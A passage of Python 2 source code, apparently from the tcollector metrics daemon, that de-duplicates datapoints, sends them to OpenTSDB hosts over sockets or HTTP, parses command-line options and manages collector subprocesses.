'((?:\s+[-_./a-zA-Z0-9]+=[-_./a-zA-Z0-9]+)*)$', # Tags + line) + if parsed is None: + LOG.warning('%s sent invalid data: %s', col.name, line) + col.lines_invalid += 1 + return + metric, timestamp, value, tags = parsed.groups() + timestamp = int(timestamp) + + # If there are more than 11 digits we're dealing with a timestamp + # with millisecond precision + if len(str(timestamp)) > 11: + global MAX_REASONABLE_TIMESTAMP + MAX_REASONABLE_TIMESTAMP = MAX_REASONABLE_TIMESTAMP * 1000 + + # De-dupe detection... To reduce the number of points we send to the + # TSD, we suppress sending values of metrics that don't change to + # only once every 10 minutes (which is also when TSD changes rows + # and how much extra time the scanner adds to the beginning/end of a + # graph interval in order to correctly calculate aggregated values). + # When the values do change, we want to first send the previous value + # with what the timestamp was when it first became that value (to keep + # slopes of graphs correct). 
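+        # Worked example (hypothetical values), dedupinterval=600:
+        #     t=0   v=1  -> sent
+        #     t=60  v=1  -> suppressed, remembered as repeated
+        #     t=120 v=2  -> the suppressed t=60 line is replayed first,
+        #                   then the new value is sent, keeping the slope
+        #                   of the graph between the two values correct.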
+ # + if self.dedupinterval != 0: # if 0 we do not use dedup + key = (metric, tags) + if key in col.values: + # if the timestamp isn't > than the previous one, ignore this value + if timestamp <= col.values[key][3]: + LOG.error(""Timestamp out of order: metric=%s%s,"" + "" old_ts=%d >= new_ts=%d - ignoring data point"" + "" (value=%r, collector=%s)"", metric, tags, + col.values[key][3], timestamp, value, col.name) + col.lines_invalid += 1 + return + elif timestamp >= MAX_REASONABLE_TIMESTAMP: + LOG.error(""Timestamp is too far out in the future: metric=%s%s"" + "" old_ts=%d, new_ts=%d - ignoring data point"" + "" (value=%r, collector=%s)"", metric, tags, + col.values[key][3], timestamp, value, col.name) + return + + # if this data point is repeated, store it but don't send. + # store the previous timestamp, so when/if this value changes + # we send the timestamp when this metric first became the current + # value instead of the last. Fall through if we reach + # the dedup interval so we can print the value. + if (col.values[key][0] == value and + (timestamp - col.values[key][3] < self.dedupinterval)): + col.values[key] = (value, True, line, col.values[key][3]) + return + + # we might have to append two lines if the value has been the same + # for a while and we've skipped one or more values. we need to + # replay the last value we skipped (if changed) so the jumps in + # our graph are accurate, + if ((col.values[key][1] or + (timestamp - col.values[key][3] >= self.dedupinterval)) + and col.values[key][0] != value): + col.lines_sent += 1 + if not self.readerq.nput(col.values[key][2]): + self.lines_dropped += 1 + + # now we can reset for the next pass and send the line we actually + # want to send + # col.values is a dict of tuples, with the key being the metric and + # tags (essentially the same as wthat TSD uses for the row key). + # The array consists of: + # [ the metric's value, if this value was repeated, the line of data, + # the value's timestamp that it last changed ] + col.values[key] = (value, False, line, timestamp) + + col.lines_sent += 1 + if not self.readerq.nput(line): + self.lines_dropped += 1 + + +class SenderThread(threading.Thread): + """"""The SenderThread is responsible for maintaining a connection + to the TSD and sending the data we're getting over to it. This + thread is also responsible for doing any sort of emergency + buffering we might need to do if we can't establish a connection + and we need to spool to disk. That isn't implemented yet."""""" + + def __init__(self, reader, dryrun, hosts, self_report_stats, tags, + reconnectinterval=0, http=False, http_username=None, + http_password=None, ssl=False, maxtags=8): + """"""Constructor. + + Args: + reader: A reference to a ReaderThread instance. + dryrun: If true, data points will be printed on stdout instead of + being sent to the TSD. + hosts: List of (host, port) tuples defining list of TSDs + self_report_stats: If true, the reader thread will insert its own + stats into the metrics reported to TSD, as if those metrics had + been read from a collector. + http: A boolean that controls whether or not the http endpoint is used. + ssl: A boolean that controls whether or not the http endpoint uses ssl. + tags: A dictionary of tags to append for every data point. 
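+            reconnectinterval: Number of seconds after which the TSD
+                connection is torn down and re-established (0 disables).
+            http_username: Username for HTTP Basic Auth when http is used.
+            http_password: Password for HTTP Basic Auth when http is used.
+            maxtags: The maximum number of tags TSD will accept per
+                datapoint; excess metric-specific tags are dropped.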
+ """""" + super(SenderThread, self).__init__() + + self.dryrun = dryrun + self.reader = reader + self.tags = sorted(tags.items()) # dictionary transformed to list + self.http = http + self.http_username = http_username + self.http_password = http_password + self.ssl = ssl + self.hosts = hosts # A list of (host, port) pairs. + # Randomize hosts to help even out the load. + random.shuffle(self.hosts) + self.blacklisted_hosts = set() # The 'bad' (host, port) pairs. + self.current_tsd = -1 # Index in self.hosts where we're at. + self.host = None # The current TSD host we've selected. + self.port = None # The port of the current TSD. + self.tsd = None # The socket connected to the aforementioned TSD. + self.last_verify = 0 + self.reconnectinterval = reconnectinterval # in seconds. + self.time_reconnect = 0 # if reconnectinterval > 0, used to track the time. + self.sendq = [] + self.self_report_stats = self_report_stats + self.maxtags = maxtags # The maximum number of tags TSD will accept. + + def pick_connection(self): + """"""Picks up a random host/port connection."""""" + # Try to get the next host from the list, until we find a host that + # isn't in the blacklist, or until we run out of hosts (i.e. they + # are all blacklisted, which typically happens when we lost our + # connectivity to the outside world). + for self.current_tsd in xrange(self.current_tsd + 1, len(self.hosts)): + hostport = self.hosts[self.current_tsd] + if hostport not in self.blacklisted_hosts: + break + else: + LOG.info('No more healthy hosts, retry with previously blacklisted') + random.shuffle(self.hosts) + self.blacklisted_hosts.clear() + self.current_tsd = 0 + hostport = self.hosts[self.current_tsd] + self.host, self.port = hostport + LOG.info('Selected connection: %s:%d', self.host, self.port) + + def blacklist_connection(self): + """"""Marks the current TSD host we're trying to use as blacklisted. + + Blacklisted hosts will get another chance to be elected once there + will be no more healthy hosts."""""" + # FIXME: Enhance this naive strategy. + LOG.info('Blacklisting %s:%s for a while', self.host, self.port) + self.blacklisted_hosts.add((self.host, self.port)) + + def run(self): + """"""Main loop. A simple scheduler. Loop waiting for 5 + seconds for data on the queue. If there's no data, just + loop and make sure our connection is still open. If there + is data, wait 5 more seconds and grab all of the pending data and + send it. A little better than sending every line as its + own packet."""""" + + errors = 0 # How many uncaught exceptions in a row we got. + while ALIVE: + try: + self.maintain_conn() + try: + line = self.reader.readerq.get(True, 5) + except Empty: + continue + self.sendq.append(line) + time.sleep(5) # Wait for more data + while True: + # prevents self.sendq fast growing in case of sending fails + # in send_data() + if len(self.sendq) > MAX_SENDQ_SIZE: + break + try: + line = self.reader.readerq.get(False) + except Empty: + break + self.sendq.append(line) + + if ALIVE: + self.send_data() + errors = 0 # We managed to do a successful iteration. 
+ except (ArithmeticError, EOFError, EnvironmentError, LookupError, + ValueError), e: + errors += 1 + if errors > MAX_UNCAUGHT_EXCEPTIONS: + shutdown() + raise + LOG.exception('Uncaught exception in SenderThread, ignoring') + time.sleep(1) + continue + except: + LOG.exception('Uncaught exception in SenderThread, going to exit') + shutdown() + raise + + def verify_conn(self): + """"""Periodically verify that our connection to the TSD is OK + and that the TSD is alive/working."""""" + # http connections don't need this + if self.http: + return True + + if self.tsd is None: + return False + + # if the last verification was less than a minute ago, don't re-verify + if self.last_verify > time.time() - 60: + return True + + # in case reconnect is activated, check if it's time to reconnect + if self.reconnectinterval > 0 and self.time_reconnect < time.time() - self.reconnectinterval: + # closing the connection and indicating that we need to reconnect. + try: + self.tsd.close() + except socket.error, msg: + pass # not handling that + self.time_reconnect = time.time() + return False + + # we use the version command as it is very low effort for the TSD + # to respond + LOG.debug('verifying our TSD connection is alive') + try: + self.tsd.sendall('version\n') + except socket.error, msg: + self.tsd = None + self.blacklist_connection() + return False + + bufsize = 4096 + while ALIVE: + # try to read as much data as we can. at some point this is going + # to block, but we have set the timeout low when we made the + # connection + try: + buf = self.tsd.recv(bufsize) + except socket.error, msg: + self.tsd = None + self.blacklist_connection() + return False + + # If we don't get a response to the `version' request, the TSD + # must be dead or overloaded. + if not buf: + self.tsd = None + self.blacklist_connection() + return False + + # Woah, the TSD has a lot of things to tell us... Let's make + # sure we read everything it sent us by looping once more. + if len(buf) == bufsize: + continue + + # If everything is good, send out our meta stats. This + # helps to see what is going on with the tcollector. + # TODO need to fix this for http + if self.self_report_stats: + strs = [ + ('reader.lines_collected', + '', self.reader.lines_collected), + ('reader.lines_dropped', + '', self.reader.lines_dropped) + ] + + for col in all_living_collectors(): + strs.append(('collector.lines_sent', 'collector=' + + col.name, col.lines_sent)) + strs.append(('collector.lines_received', 'collector=' + + col.name, col.lines_received)) + strs.append(('collector.lines_invalid', 'collector=' + + col.name, col.lines_invalid)) + + ts = int(time.time()) + strout = [""tcollector.%s %d %d %s"" + % (x[0], ts, x[2], x[1]) for x in strs] + for string in strout: + self.sendq.append(string) + + break # TSD is alive. + + # if we get here, we assume the connection is good + self.last_verify = time.time() + return True + + def maintain_conn(self): + """"""Safely connect to the TSD and ensure that it's up and + running and that we're not talking to a ghost connection + (no response)."""""" + + # dry runs and http are always good + if self.dryrun or self.http: + return + + # connection didn't verify, so create a new one. we might be in + # this method for a long time while we sort this out. + try_delay = 1 + while ALIVE: + if self.verify_conn(): + return + + # increase the try delay by some amount and some random value, + # in case the TSD is down for a while. delay at most + # approximately 10 minutes. 
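+            # e.g. starting from 1s, the random multiplier (1x..2x, about
+            # 1.5x on average) needs roughly 15 failed attempts to reach
+            # the 600s ceiling; above that the delay is halved, so it then
+            # oscillates between roughly 5 and 10 minutes.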
+ try_delay *= 1 + random.random() + if try_delay > 600: + try_delay *= 0.5 + LOG.debug('SenderThread blocking %0.2f seconds', try_delay) + time.sleep(try_delay) + + # Now actually try the connection. + self.pick_connection() + try: + addresses = socket.getaddrinfo(self.host, self.port, + socket.AF_UNSPEC, + socket.SOCK_STREAM, 0) + except socket.gaierror, e: + # Don't croak on transient DNS resolution issues. + if e[0] in (socket.EAI_AGAIN, socket.EAI_NONAME, + socket.EAI_NODATA): + LOG.debug('DNS resolution failure: %s: %s', self.host, e) + continue + raise + for family, socktype, proto, canonname, sockaddr in addresses: + try: + self.tsd = socket.socket(family, socktype, proto) + self.tsd.settimeout(15) + self.tsd.connect(sockaddr) + # if we get here it connected + LOG.debug('Connection to %s was successful'%(str(sockaddr))) + break + except socket.error, msg: + LOG.warning('Connection attempt failed to %s:%d: %s', + self.host, self.port, msg) + self.tsd.close() + self.tsd = None + if not self.tsd: + LOG.error('Failed to connect to %s:%d', self.host, self.port) + self.blacklist_connection() + + def add_tags_to_line(self, line): + for tag, value in self.tags: + if ' %s=' % tag not in line: + line += ' %s=%s' % (tag, value) + return line + + def send_data(self): + """"""Sends outstanding data in self.sendq to the TSD in one operation."""""" + if self.http: + return self.send_data_via_http() + + # construct the output string + out = '' + + # in case of logging we use less efficient variant + if LOG.level == logging.DEBUG: + for line in self.sendq: + line = ""put %s"" % self.add_tags_to_line(line) + out += line + ""\n"" + LOG.debug('SENDING: %s', line) + else: + out = """".join(""put %s\n"" % self.add_tags_to_line(line) for line in self.sendq) + + if not out: + LOG.debug('send_data no data?') + return + + # try sending our data. if an exception occurs, just error and + # try sending again next time. 
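+        # Wire format is the plain TSD telnet-style protocol, one
+        # datapoint per line, e.g. (hypothetical):
+        #     put proc.loadavg.1min 1478020200 0.36 host=web1
+        # All pending lines are then batched into a single sendall().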
+ try: + if self.dryrun: + print out + else: + self.tsd.sendall(out) + self.sendq = [] + except socket.error, msg: + LOG.error('failed to send data: %s', msg) + try: + self.tsd.close() + except socket.error: + pass + self.tsd = None + self.blacklist_connection() + + # FIXME: we should be reading the result at some point to drain + # the packets out of the kernel's queue + + def send_data_via_http(self): + """"""Sends outstanding data in self.sendq to TSD in one HTTP API call."""""" + metrics = [] + for line in self.sendq: + # print "" %s"" % line + parts = line.split(None, 3) + # not all metrics have metric-specific tags + if len(parts) == 4: + (metric, timestamp, value, raw_tags) = parts + else: + (metric, timestamp, value) = parts + raw_tags = """" + # process the tags + metric_tags = {} + for tag in raw_tags.strip().split(): + (tag_key, tag_value) = tag.split(""="", 1) + metric_tags[tag_key] = tag_value + metric_entry = {} + metric_entry[""metric""] = metric + metric_entry[""timestamp""] = long(timestamp) + metric_entry[""value""] = float(value) + metric_entry[""tags""] = dict(self.tags).copy() + if len(metric_tags) + len(metric_entry[""tags""]) > self.maxtags: + metric_tags_orig = set(metric_tags) + subset_metric_keys = frozenset(metric_tags[:len(metric_tags[:self.maxtags-len(metric_entry[""tags""])])]) + metric_tags = dict((k, v) for k, v in metric_tags.iteritems() if k in subset_metric_keys) + LOG.error(""Exceeding maximum permitted metric tags - removing %s for metric %s"", + str(metric_tags_orig - set(metric_tags)), metric) + metric_entry[""tags""].update(metric_tags) + metrics.append(metric_entry) + + if self.dryrun: + print ""Would have sent:\n%s"" % json.dumps(metrics, + sort_keys=True, + indent=4) + return + + self.pick_connection() + # print ""Using server: %s:%s"" % (self.host, self.port) + # url = ""http://%s:%s/api/put?details"" % (self.host, self.port) + # print ""Url is %s"" % url + LOG.debug(""Sending metrics to http://%s:%s/api/put?details"", + self.host, self.port) + if self.ssl: + protocol = ""https"" + else: + protocol = ""http"" + req = urllib2.Request(""%s://%s:%s/api/put?details"" % ( + protocol, self.host, self.port)) + if self.http_username and self.http_password: + req.add_header(""Authorization"", ""Basic %s"" + % base64.b64encode(""%s:%s"" % (self.http_username, self.http_password))) + req.add_header(""Content-Type"", ""application/json"") + try: + response = urllib2.urlopen(req, json.dumps(metrics)) + LOG.debug(""Received response %s"", response.getcode()) + # clear out the sendq + self.sendq = [] + # print ""Got response code: %s"" % response.getcode() + # print ""Content:"" + # for line in response: + # print line, + # print + except urllib2.HTTPError, e: + LOG.error(""Got error %s"", e) + # for line in http_error: + # print line, + + +def setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None): + """"""Sets up logging and associated handlers."""""" + + LOG.setLevel(logging.INFO) + if backup_count is not None and max_bytes is not None: + assert backup_count > 0 + assert max_bytes > 0 + ch = RotatingFileHandler(logfile, 'a', max_bytes, backup_count) + else: # Setup stream handler. 
+ ch = logging.StreamHandler(sys.stdout) + + ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] ' + '%(levelname)s: %(message)s')) + LOG.addHandler(ch) + + +def parse_cmdline(argv): + """"""Parses the command-line."""""" + + # get arguments + default_cdir = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), + 'collectors') + parser = OptionParser(description='Manages collectors which gather ' + 'data and report back.') + parser.add_option('-c', '--collector-dir', dest='cdir', metavar='DIR', + default=default_cdir, + help='Directory where the collectors are located.') + parser.add_option('-d', '--dry-run', dest='dryrun', action='store_true', + default=False, + help='Don\'t actually send anything to the TSD, ' + 'just print the datapoints.') + parser.add_option('-D', '--daemonize', dest='daemonize', action='store_true', + default=False, help='Run as a background daemon.') + parser.add_option('-H', '--host', dest='host', default='localhost', + metavar='HOST', + help='Hostname to use to connect to the TSD.') + parser.add_option('-L', '--hosts-list', dest='hosts', default=False, + metavar='HOSTS', + help='List of host:port to connect to tsd\'s (comma separated).') + parser.add_option('--no-tcollector-stats', dest='no_tcollector_stats', + default=False, action='store_true', + help='Prevent tcollector from reporting its own stats to TSD') + parser.add_option('-s', '--stdin', dest='stdin', action='store_true', + default=False, + help='Run once, read and dedup data points from stdin.') + parser.add_option('-p', '--port', dest='port', type='int', + default=DEFAULT_PORT, metavar='PORT', + help='Port to connect to the TSD instance on. ' + 'default=%default') + parser.add_option('-v', dest='verbose', action='store_true', default=False, + help='Verbose mode (log debug messages).') + parser.add_option('-t', '--tag', dest='tags', action='append', + default=[], metavar='TAG', + help='Tags to append to all timeseries we send, ' + 'e.g.: -t TAG=VALUE -t TAG2=VALUE') + parser.add_option('-P', '--pidfile', dest='pidfile', + default='/var/run/tcollector.pid', + metavar='FILE', help='Write our pidfile') + parser.add_option('--dedup-interval', dest='dedupinterval', type='int', + default=300, metavar='DEDUPINTERVAL', + help='Number of seconds in which successive duplicate ' + 'datapoints are suppressed before sending to the TSD. ' + 'Use zero to disable. ' + 'default=%default') + parser.add_option('--evict-interval', dest='evictinterval', type='int', + default=6000, metavar='EVICTINTERVAL', + help='Number of seconds after which to remove cached ' + 'values of old data points to save memory. ' + 'default=%default') + parser.add_option('--allowed-inactivity-time', dest='allowed_inactivity_time', type='int', + default=ALLOWED_INACTIVITY_TIME, metavar='ALLOWEDINACTIVITYTIME', + help='How long to wait for datapoints before assuming ' + 'a collector is dead and restart it. 
' + 'default=%default') + parser.add_option('--remove-inactive-collectors', dest='remove_inactive_collectors', action='store_true', + default=False, help='Remove collectors not sending data ' + 'in the max allowed inactivity interval') + parser.add_option('--max-bytes', dest='max_bytes', type='int', + default=64 * 1024 * 1024, + help='Maximum bytes per a logfile.') + parser.add_option('--backup-count', dest='backup_count', type='int', + default=0, help='Maximum number of logfiles to backup.') + parser.add_option('--logfile', dest='logfile', type='str', + default=DEFAULT_LOG, + help='Filename where logs are written to.') + parser.add_option('--reconnect-interval',dest='reconnectinterval', type='int', + default=0, metavar='RECONNECTINTERVAL', + help='Number of seconds after which the connection to' + 'the TSD hostname reconnects itself. This is useful' + 'when the hostname is a multiple A record (RRDNS).' + ) + parser.add_option('--max-tags', dest='maxtags', type=int, default=8, + help='The maximum number of tags to send to our TSD Instances') + parser.add_option('--http', dest='http', action='store_true', default=False, + help='Send the data via the http interface') + parser.add_option('--http-username', dest='http_username', default=False, + help='Username to use for HTTP Basic Auth when sending the data via HTTP') + parser.add_option('--http-password', dest='http_password', default=False, + help='Password to use for HTTP Basic Auth when sending the data via HTTP') + parser.add_option('--ssl', dest='ssl', action='store_true', default=False, + help='Enable SSL - used in conjunction with http') + (options, args) = parser.parse_args(args=argv[1:]) + if options.dedupinterval < 0: + parser.error('--dedup-interval must be at least 0 seconds') + if options.evictinterval <= options.dedupinterval: + parser.error('--evict-interval must be strictly greater than ' + '--dedup-interval') + if options.reconnectinterval < 0: + parser.error('--reconnect-interval must be at least 0 seconds') + # We cannot write to stdout when we're a daemon. + if (options.daemonize or options.max_bytes) and not options.backup_count: + options.backup_count = 1 + return (options, args) + + +def daemonize(): + """"""Performs the necessary dance to become a background daemon."""""" + if os.fork(): + os._exit(0) + os.chdir(""/"") + os.umask(022) + os.setsid() + os.umask(0) + if os.fork(): + os._exit(0) + stdin = open(os.devnull) + stdout = open(os.devnull, 'w') + os.dup2(stdin.fileno(), 0) + os.dup2(stdout.fileno(), 1) + os.dup2(stdout.fileno(), 2) + stdin.close() + stdout.close() + os.umask(022) + for fd in xrange(3, 1024): + try: + os.close(fd) + except OSError: # This FD wasn't opened... + pass # ... ignore the exception. 
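+# (daemonize() above is the classic double fork: the first fork plus
+# setsid() detaches the process from its controlling terminal, and the
+# second fork ensures it is not a session leader and so can never
+# reacquire one)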
+ + +def setup_python_path(collector_dir): + """"""Sets up PYTHONPATH so that collectors can easily import common code."""""" + mydir = os.path.dirname(collector_dir) + libdir = os.path.join(mydir, 'collectors', 'lib') + if not os.path.isdir(libdir): + return + pythonpath = os.environ.get('PYTHONPATH', '') + if pythonpath: + pythonpath += ':' + pythonpath += mydir + os.environ['PYTHONPATH'] = pythonpath + LOG.debug('Set PYTHONPATH to %r', pythonpath) + + +def main(argv): + """"""The main tcollector entry point and loop."""""" + + options, args = parse_cmdline(argv) + if options.daemonize: + daemonize() + setup_logging(options.logfile, options.max_bytes or None, + options.backup_count or None) + + if options.verbose: + LOG.setLevel(logging.DEBUG) # up our level + + if options.pidfile: + write_pid(options.pidfile) + + # validate everything + tags = {} + for tag in options.tags: + if re.match('^[-_.a-z0-9]+=\S+$', tag, re.IGNORECASE) is None: + assert False, 'Tag string ""%s"" is invalid.' % tag + k, v = tag.split('=', 1) + if k in tags: + assert False, 'Tag ""%s"" already declared.' % k + tags[k] = v + + if not 'host' in tags and not options.stdin: + tags['host'] = socket.gethostname() + LOG.warning('Tag ""host"" not specified, defaulting to %s.', tags['host']) + + options.cdir = os.path.realpath(options.cdir) + if not os.path.isdir(options.cdir): + LOG.fatal('No such directory: %s', options.cdir) + return 1 + modules = load_etc_dir(options, tags) + + setup_python_path(options.cdir) + + # gracefully handle death for normal termination paths and abnormal + atexit.register(shutdown) + for sig in (signal.SIGTERM, signal.SIGINT): + signal.signal(sig, shutdown_signal) + + # at this point we're ready to start processing, so start the ReaderThread + # so we can have it running and pulling in data for us + reader = ReaderThread(options.dedupinterval, options.evictinterval) + reader.start() + + # prepare list of (host, port) of TSDs given on CLI + if not options.hosts: + options.hosts = [(options.host, options.port)] + else: + def splitHost(hostport): + if "":"" in hostport: + # Check if we have an IPv6 address. + if hostport[0] == ""["" and ""]:"" in hostport: + host, port = hostport.split(""]:"") + host = host[1:] + else: + host, port = hostport.split("":"") + return (host, int(port)) + return (hostport, DEFAULT_PORT) + options.hosts = [splitHost(host) for host in options.hosts.split("","")] + if options.host != ""localhost"" or options.port != DEFAULT_PORT: + options.hosts.append((options.host, options.port)) + + # and setup the sender to start writing out to the tsd + sender = SenderThread(reader, options.dryrun, options.hosts, + not options.no_tcollector_stats, tags, options.reconnectinterval, + options.http, options.http_username, + options.http_password, options.ssl, options.maxtags) + sender.start() + LOG.info('SenderThread startup complete') + + # if we're in stdin mode, build a stdin collector and just join on the + # reader thread since there's nothing else for us to do here + if options.stdin: + register_collector(StdinCollector()) + stdin_loop(options, modules, sender, tags) + else: + sys.stdin.close() + main_loop(options, modules, sender, tags) + + # We're exiting, make sure we don't leave any collector behind. 
+ for col in all_living_collectors(): + col.shutdown() + LOG.debug('Shutting down -- joining the reader thread.') + reader.join() + LOG.debug('Shutting down -- joining the sender thread.') + sender.join() + +def stdin_loop(options, modules, sender, tags): + """"""The main loop of the program that runs when we are in stdin mode."""""" + + global ALIVE + next_heartbeat = int(time.time() + 600) + while ALIVE: + time.sleep(15) + reload_changed_config_modules(modules, options, sender, tags) + now = int(time.time()) + if now >= next_heartbeat: + LOG.info('Heartbeat (%d collectors running)' + % sum(1 for col in all_living_collectors())) + next_heartbeat = now + 600 + +def main_loop(options, modules, sender, tags): + """"""The main loop of the program that runs when we're not in stdin mode."""""" + + next_heartbeat = int(time.time() + 600) + while ALIVE: + populate_collectors(options.cdir) + reload_changed_config_modules(modules, options, sender, tags) + reap_children() + check_children(options) + spawn_children() + time.sleep(15) + now = int(time.time()) + if now >= next_heartbeat: + LOG.info('Heartbeat (%d collectors running)' + % sum(1 for col in all_living_collectors())) + next_heartbeat = now + 600 + + +def list_config_modules(etcdir): + """"""Returns an iterator that yields the name of all the config modules."""""" + if not os.path.isdir(etcdir): + return iter(()) # Empty iterator. + return (name for name in os.listdir(etcdir) + if (name.endswith('.py') + and os.path.isfile(os.path.join(etcdir, name)))) + + +def load_etc_dir(options, tags): + """"""Loads any Python module from tcollector's own 'etc' directory. + + Returns: A dict of path -> (module, timestamp). + """""" + + etcdir = os.path.join(options.cdir, 'etc') + sys.path.append(etcdir) # So we can import modules from the etc dir. + modules = {} # path -> (module, timestamp) + for name in list_config_modules(etcdir): + path = os.path.join(etcdir, name) + module = load_config_module(name, options, tags) + modules[path] = (module, os.path.getmtime(path)) + return modules + + +def load_config_module(name, options, tags): + """"""Imports the config module of the given name + + The 'name' argument can be a string, in which case the module will be + loaded by name, or it can be a module object, in which case the module + will get reloaded. + + If the module has an 'onload' function, calls it. + Returns: the reference to the module loaded. + """""" + + if isinstance(name, str): + LOG.info('Loading %s', name) + d = {} + # Strip the trailing .py + module = __import__(name[:-3], d, d) + else: + module = reload(name) + onload = module.__dict__.get('onload') + if callable(onload): + try: + onload(options, tags) + except: + LOG.fatal('Exception while loading %s', name) + raise + return module + + +def reload_changed_config_modules(modules, options, sender, tags): + """"""Reloads any changed modules from the 'etc' directory. + + Args: + cdir: The path to the 'collectors' directory. + modules: A dict of path -> (module, timestamp). + Returns: whether or not anything has changed. + """""" + + etcdir = os.path.join(options.cdir, 'etc') + current_modules = set(list_config_modules(etcdir)) + current_paths = set(os.path.join(etcdir, name) + for name in current_modules) + changed = False + + # Reload any module that has changed. + for path, (module, timestamp) in modules.iteritems(): + if path not in current_paths: # Module was removed. 
+ continue + mtime = os.path.getmtime(path) + if mtime > timestamp: + LOG.info('Reloading %s, file has changed', path) + module = load_config_module(module, options, tags) + modules[path] = (module, mtime) + changed = True + + # Forget any module that has been removed from disk. + for path in set(modules).difference(current_paths): + LOG.info('%s has been removed, tcollector should be restarted', path) + del modules[path] + changed = True + + # Check for any modules that may have been added. + for name in current_modules: + path = os.path.join(etcdir, name) + if path not in modules: + module = load_config_module(name, options, tags) + modules[path] = (module, os.path.getmtime(path)) + changed = True + + return changed + + +def write_pid(pidfile): + """"""Write our pid to a pidfile."""""" + f = open(pidfile, ""w"") + try: + f.write(str(os.getpid())) + finally: + f.close() + + +def all_collectors(): + """"""Generator to return all collectors."""""" + + return COLLECTORS.itervalues() + + +# collectors that are not marked dead +def all_valid_collectors(): + """"""Generator to return all defined collectors that haven't been marked + dead in the past hour, allowing temporarily broken collectors a + chance at redemption."""""" + + now = int(time.time()) + for col in all_collectors(): + if not col.dead or (now - col.lastspawn > 3600): + yield col + + +# collectors that have a process attached (currently alive) +def all_living_collectors(): + """"""Generator to return all defined collectors that have + an active process."""""" + + for col in all_collectors(): + if col.proc is not None: + yield col + + +def shutdown_signal(signum, frame): + """"""Called when we get a signal and need to terminate."""""" + LOG.warning(""shutting down, got signal %d"", signum) + shutdown() + + +def kill(proc, signum=signal.SIGTERM): + os.killpg(proc.pid, signum) + + +def shutdown(): + """"""Called by atexit and when we receive a signal, this ensures we properly + terminate any outstanding children."""""" + + global ALIVE + # prevent repeated calls + if not ALIVE: + return + # notify threads of program termination + ALIVE = False + + LOG.info('shutting down children') + + # tell everyone to die + for col in all_living_collectors(): + col.shutdown() + + LOG.info('exiting') + sys.exit(1) + + +def reap_children(): + """"""When a child process dies, we have to determine why it died and whether + or not we need to restart it. This method manages that logic."""""" + + for col in all_living_collectors(): + now = int(time.time()) + # FIXME: this is not robust. the asyncproc module joins on the + # reader threads when you wait if that process has died. this can cause + # slow dying processes to hold up the main loop. good for now though. + status = col.proc.poll() + if status is None: + continue + col.proc = None + + # behavior based on status. a code 0 is normal termination, code 13 + # is used to indicate that we don't want to restart this collector. + # any other status code is an error and is logged.
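+ # For example (illustrative, not part of tcollector itself), a collector + # script can opt out of being respawned by ending with: + # sys.exit(13)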
+ if status == 13: + LOG.info('removing %s from the list of collectors (by request)', + col.name) + col.dead = True + elif status != 0: + LOG.warning('collector %s terminated after %d seconds with ' + 'status code %d, marking dead', + col.name, now - col.lastspawn, status) + col.dead = True + else: + register_collector(Collector(col.name, col.interval, col.filename, + col.mtime, col.lastspawn)) + +def check_children(options): + """"""When we haven't received a datapoint from a child process in a while, + assume it's died in some fashion and restart it."""""" + + for col in all_living_collectors(): + now = int(time.time()) + + if col.last_datapoint < (now - options.allowed_inactivity_time): + # It's too old, kill it + LOG.warning('Terminating collector %s after %d seconds of inactivity', + col.name, now - col.last_datapoint) + col.shutdown() + if not options.remove_inactive_collectors: + register_collector(Collector(col.name, col.interval, col.filename, + col.mtime, col.lastspawn)) + + +def set_nonblocking(fd): + """"""Sets the given file descriptor to non-blocking mode."""""" + fl = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK + fcntl.fcntl(fd, fcntl.F_SETFL, fl) + + +def spawn_collector(col): + """"""Takes a Collector object and creates a process for it."""""" + + LOG.info('%s (interval=%d) needs to be spawned', col.name, col.interval) + + # FIXME: do custom integration of Python scripts into memory/threads + # if re.search('\.py$', col.name) is not None: + # ... load the py module directly instead of using a subprocess ... + try: + col.proc = subprocess.Popen(col.filename, stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + close_fds=True, + preexec_fn=os.setsid) + except OSError, e: + LOG.error('Failed to spawn collector %s: %s' % (col.filename, e)) + return + # Update the last spawn time only after a successful Popen; it is used in + # other logic, and it makes no sense to update it if the collector didn't + # actually start. + col.lastspawn = int(time.time()) + set_nonblocking(col.proc.stdout.fileno()) + set_nonblocking(col.proc.stderr.fileno()) + if col.proc.pid > 0: + col.dead = False + LOG.info('spawned %s (pid=%d)', col.name, col.proc.pid) + return + # FIXME: handle errors better + LOG.error('failed to spawn collector: %s', col.filename) + + +def spawn_children(): + """"""Iterates over our defined collectors and performs the logic to + determine if we need to spawn, kill, or otherwise take some + action on them."""""" + + if not ALIVE: + return + + for col in all_valid_collectors(): + now = int(time.time()) + if col.interval == 0: + if col.proc is None: + spawn_collector(col) + elif col.interval <= now - col.lastspawn: + if col.proc is None: + spawn_collector(col) + continue + + # I'm not very satisfied with this path. It seems fragile and + # overly complex, maybe we should just rely on the asyncproc + # terminate method, but that would make the main tcollector + # block until it dies...
:| + if col.nextkill > now: + continue + if col.killstate == 0: + LOG.warning('warning: %s (interval=%d, pid=%d) overstayed ' + 'its welcome, SIGTERM sent', + col.name, col.interval, col.proc.pid) + kill(col.proc) + col.nextkill = now + 5 + col.killstate = 1 + elif col.killstate == 1: + LOG.error('error: %s (interval=%d, pid=%d) still not dead, ' + 'SIGKILL sent', + col.name, col.interval, col.proc.pid) + kill(col.proc, signal.SIGKILL) + col.nextkill = now + 5 + col.killstate = 2 + else: + LOG.error('error: %s (interval=%d, pid=%d) needs manual ' + 'intervention to kill it', + col.name, col.interval, col.proc.pid) + col.nextkill = now + 300 + + +def populate_collectors(coldir): + """"""Maintains our internal list of valid collectors. This walks the + collector directory and looks for files. In subsequent calls, this + also looks for changes to the files -- new, removed, or updated files, + and takes the right action to bring the state of our running processes + in line with the filesystem."""""" + + global GENERATION + GENERATION += 1 + + # get numerics from scriptdir, we're only setup to handle numeric paths + # which define intervals for our monitoring scripts + for interval in os.listdir(coldir): + if not interval.isdigit(): + continue + interval = int(interval) + + for colname in os.listdir('%s/%d' % (coldir, interval)): + if colname.startswith('.'): + continue + + filename = '%s/%d/%s' % (coldir, interval, colname) + if os.path.isfile(filename) and os.access(filename, os.X_OK): + mtime = os.path.getmtime(filename) + + # if this collector is already 'known', then check if it's + # been updated (new mtime) so we can kill off the old one + # (but only if it's interval 0, else we'll just get + # it next time it runs) + if colname in COLLECTORS: + col = COLLECTORS[colname] + + # if we get a dupe, then ignore the one we're trying to + # add now. there is probably a more robust way of 